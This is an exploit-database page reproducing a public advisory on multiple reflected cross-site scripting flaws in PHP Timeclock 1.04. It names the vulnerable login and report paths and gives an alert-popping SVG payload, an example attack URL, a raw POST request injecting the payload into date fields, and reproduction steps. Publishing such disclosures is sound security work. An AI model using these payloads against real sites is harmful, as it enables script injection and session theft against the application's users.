Php timeclock 1.04 multiple cross site scripting (xss) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-05-10 | Type : webapps | Platform : php
This exploit / vulnerability Php timeclock 1.04 multiple cross site scripting (xss) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)
# Date: May 3rd 2021
# Exploit Author: Tyler Butler
# Vendor Homepage: http://timeclock.sourceforge.net
# Software Link: https://sourceforge.net/projects/timeclock/files/PHP%20Timeclock/PHP%20Timeclock%201.04/
# Version: 1.04
# Tested on: PHP 4.4.9/5.3.3 Apache 2.2 MySql 4.1.22/5

Description: PHP Timeclock version 1.04 (and prior) suffers from multiple Cross-Site Scripting vulnerabilities

#1: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application by appending a termination /'> and payload directly to the end of the GET request URL. The vulnerable paths include (1) /login.php (2) /timeclock.php (3) /reports/audit.php and (4) /reports/timerpt.php.


Payload: /'><svg/onload=alert`xss`>

Example: http://target/login.php/'%3E%3Csvg/onload=alert%60xss%60%3E
ß

Steps to reproduce:
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
2. Make a GET request to one of the four resources mentioned above
3. Append /'> and the payload to the end of the request
4. Submit the request and observe payload execution


#2: Unauthenticated Reflected XSS: Arbitrary javascript can be injected into the application in POST requests to (1) /reports/audit.php (2) /reports/total_hours.php (3) /reports/timerpt.php via the from_date and to_date parameters.

# Example:

POST /reports/audit.php HTTP/1.1
Host: localhost
Content-Length: 98
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/reports/audit.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=62cfcffbd929595ba31915b4d8f01d7d; remember_me=foo
Connection: close

date_format=M%2Fd%2Fyyyy&from_date=5%2F2%2F2021'><svg/onload=alert`xss`>&to_date=5%2F18%2F2021&csv=0&submit.x=40&submit.y=5


Payload: '><svg/onload=alert`xss`>


Steps to reproduce:
1. Navigate to a site that uses PHP Timeclock 1.04 or earlier
2. Create a report at one of the vulnerable directories noted above
3. Intercept the request with a proxy tool like BurpSuite
4. Inject payload into the from_date or to_date fields

Php timeclock 1.04 multiple cross site scripting (xss)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Php timeclock 1.04 multiple cross site scripting (xss) Vulnerability / Exploit